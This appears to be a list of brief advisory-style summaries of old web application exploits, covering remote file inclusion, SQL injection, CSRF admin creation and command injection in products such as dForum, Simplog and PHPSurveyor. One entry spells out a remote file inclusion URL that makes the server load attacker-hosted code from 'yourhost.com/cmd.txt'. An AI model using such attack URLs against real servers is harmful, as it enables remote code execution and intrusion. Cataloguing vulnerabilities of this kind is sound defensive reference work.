In the movie_cls.php file, the require_once() function is used to include a file from a user-supplied input. This can be exploited to include arbitrary files from remote locations by passing a URL in the full_path parameter. This can be used to execute arbitrary commands on the vulnerable system.
ClanSys v1.1 is vulnerable to PHP Code Insertion. An attacker can exploit this vulnerability by sending a crafted HTTP request containing malicious PHP code to the vulnerable application. The malicious code will be executed by the web server.
A Cross-Site Request Forgery (XSRF) vulnerability exists in Web Links 1.0, which allows an attacker to add an admin user to the application. The attacker can craft a malicious HTML form with hidden fields containing the username, password, email, and group_id of the new admin user. When the form is submitted, the application will add the user without any authentication.
This exploit allows a remote attacker to execute arbitrary commands on a vulnerable system. The vulnerability exists due to insufficient sanitization of user-supplied input passed to the 'command' parameter in 'stats.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious commands to the vulnerable system.
This exploit works on dForum <= 1.5 by accessing the vulnerable files such as about.php, admin.php, anmelden.php, closethread.php, config.php, delpost.php, delthread.php, dfcode.php, download.php, editanoc.php, forum.php, login.php, makethread.php, menu.php, newthread.php, openthread.php, overview.php, post.php, suchen.php, user.php, userconfig.php, userinfo.php, verwalten.php, by using the URL http://[victim]/[dForumPath]/[filename]?DFORUM_PATH=http://yourhost.com/cmd.txt?
Simplog is vulnerable to a remote SQL injection attack. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information such as usernames and passwords. The vulnerability is due to insufficient sanitization of user-supplied input in the 'blogid' parameter of the 'preview.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable server.
This exploit allows an attacker to gain access to the CoreNews database by exploiting a SQL injection vulnerability in the 'preview.php' file. The exploit sends an HTTP request to the vulnerable server with a malicious payload, which then allows the attacker to extract the login and password of the database. The exploit is written in Perl and can be used to gain access to the database.
This exploit allows an attacker to remotely change the administrator password (or password hash) of Symantec Scan Engine.
PHPSurveyor is vulnerable to a remote code execution vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to execute arbitrary code on the vulnerable system.
ASPSitem <= 1.83 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information such as usernames and passwords.
Services By CQR